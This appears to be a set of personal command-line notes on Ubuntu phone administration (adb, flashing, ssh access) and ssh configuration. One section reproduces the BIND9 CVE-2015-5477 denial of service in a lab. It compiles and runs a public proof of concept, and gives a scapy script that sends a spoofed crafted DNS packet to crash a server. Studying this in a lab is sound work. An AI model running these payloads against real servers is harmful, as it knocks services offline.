# Ubuntu phone: Writeable image and ssh access


$ phablet-config writable-image
$ adb shell
$ sudo su -
# cat /etc/init/ssh.override
manual
exec /usr/sbin/sshd -D
# setprop persist.service.ssh true
# ssh-keygen -A
# service ssh start
# netstat -putan
# reboot
$ ssh phablet@mx4
$ sudo su -
# apt-get update
# apt-get upgrade

# Ubuntu phone: adb (Android Debug Bridge) commands


Architecture

__Phone__                 _______________Host______________
[Daemon]-----<USB/TCP>-----[Server]-----<TCP>-----[Client]
/usr/bin/adbd              /usr/bin/adb -P 5037 fork-server server
                                                  /usr/bin/adb <command>

Commands

$ adb -h
$ adb kill-server
$ adb start-server
$ adb devices -l
$ adb get-state # offline | bootloader | device
$ adb get-serialno
$ adb get-devpath
$ adb status-window # watch 'adb get-state'
$ adb push /local/path /remote/path
$ adb pull /remote/path /local/path
$ adb reboot [bootloader|recovery]
$ adb sync /local/path # if local_file is newer then adb push
$ adb shell [command]

# Ubuntu phone: Image files


$ ubuntu-device-flash query --device=arale --channel=ubuntu-touch/stable/meizu.en --show-image
Device: arale
Description: ubuntu=20150720,device=20150709-8965e37,custom=20150716-819-8-42,version=3
Version: 3
Channel: ubuntu-touch/stable/meizu.en
Files:
 0 https://system-image.ubuntu.com/pool/ubuntu-3f76909df7e5a57984c51d6eb6d56391bef08c637279d7f179cb7bc866b1cbe7.tar.xz 299883524 665847e3b9f79c8179ca4654f1fa47dc678b1aed1565b0925428d11e15fecab6
 1 https://system-image.ubuntu.com/pool/device-9e1719b0b8ad1bb572fbdd49d3e2b7dc6fd382365c0e1b56f4f9d732b656df11.tar.xz 108227112 0622bed0cde446a0cc0fdea0ff131edde225665fb5590a2c744e55b425d37af5
 2 https://system-image.ubuntu.com/pool/custom-a6418398d3c33da55e36ec02b695cdc0bfd45f32fc481d2ff05a1983f866234d.tar.xz 63786376 f8d2459586a0b0518eda9b521a5bc7cb76dbfce18e4677870136e7cc9e86d74b
 3 https://system-image.ubuntu.com/ubuntu-touch/stable/meizu.en/arale/version-3.tar.xz 448 ef14dd19f4e28a2447b37b576961d5e30b8611a212c912ab42c8b4b111e2762b
Metadata   : version.tar.xz
Nexus | BQ | Meizu : custom.tar.xz
Ubuntu   : ubuntu.tar.xz
Nexus 4 | E4.5 | MX4 : device.tar.xz

# Ubuntu phone: ubuntu-device-flash


$ adb devices
$ adb shell grep ro.product.name /system/build.prop
ro.product.name=arale
$ adb shell grep build.id /system/build.prop
ro.build.id=KOT49H
$ adb shell grep ro.product.device /system/build.prop
ro.product.device=arale
$ ubuntu-device-flash query --device=arale --list-channels
$ wget http://people.canonical.com/~alextu/tangxi/recovery/recovery.img
$ adb reboot recovery
$ fastboot flash recovery recovery.img
$ fastboot reboot-bootloader
$ ubuntu-device-flash touch --device=arale --channel=ubuntu-touch/stable/meizu.en --developer-mode --password=1234 --wipe

# CVE-2015-5477: BIND9 TKEY assert DoS


Server

# wget -O bind-9-10-2-p2.tar.gz https://www.isc.org/downloads/file/bind-9-10-2-p2/?version=tar-gz
# tar xvzf bind-9-10-2-p2.tar.gz
# cd bind-9.10.2-P2
# ./configure --without-openssl
# make
# touch /etc/named.conf
# bin/named/named -g

Client

# apt-get install fpdns
# fpdns server_ip
fingerprint (server_ip, server_ip): ISC BIND 9.2.3rc1 -- 9.6.1-P1 [recursion enabled]
# dig @server_ip -c chaos -t txt version.bind +short
"9.10.2-P2"
# wget https://raw.githubusercontent.com/robertdavidgraham/cve-2015-5477/master/tkill.c
# gcc -o tkill tkill.c
# ./tkill server_ip
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] server_ip: Resolving to IP address
[+] server_ip: Resolved to multiple IPs (NOTE)
[+] server_ip: Probing...
[+] Querying version...
[+] server_ip: "9.10.2-P2" 
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
# cat cve-2015-5477.py
from scapy.all import *
from sys import argv

target = argv[1]

spoofed = '192.0.2.1'
dns_query = '\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x03foo\x03bar\x00\x00\xf9\x00\xff\x03foo\x03bar\x00\x00\x10\x00\xff\x00\x00\x00\x00\x00\x07\x06foobar'

send(IP(src = spoofed, dst = target) / UDP(dport = 53) / Raw(load = dns_query))
# python cve-2015-5477.py server_ip

Reference

https://github.com/robertdavidgraham/cve-2015-5477

# Avoid sending public keys to SSH servers by default


# cat .ssh/config
Host *
 IdentitiesOnly yes
 PubkeyAuthentication no

#Host example1
# Hostname ssh.example1.org
# Port 22
# User test


#Host example2
# Hostname ssh.example2.org
# IdentityFile ~/.ssh/example2_id_rsa
# PubkeyAuthentication yes

# ssh-keygen -t rsa -b 2048 -C test@ssh.example2.org -f ~/.ssh/example2_id_rsa
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in ~/.ssh/example2_id_rsa.
Your public key has been saved in ~/.ssh/example2_id_rsa.pub.
The key fingerprint is:
4d:4b:d5:3c:ca:db:ed:b4:2b:6f:6e:3d:74:32:f3:31 test@ssh.example2.org

Reference

https://github.com/FiloSottile/whosthere#how-do-i-stop-it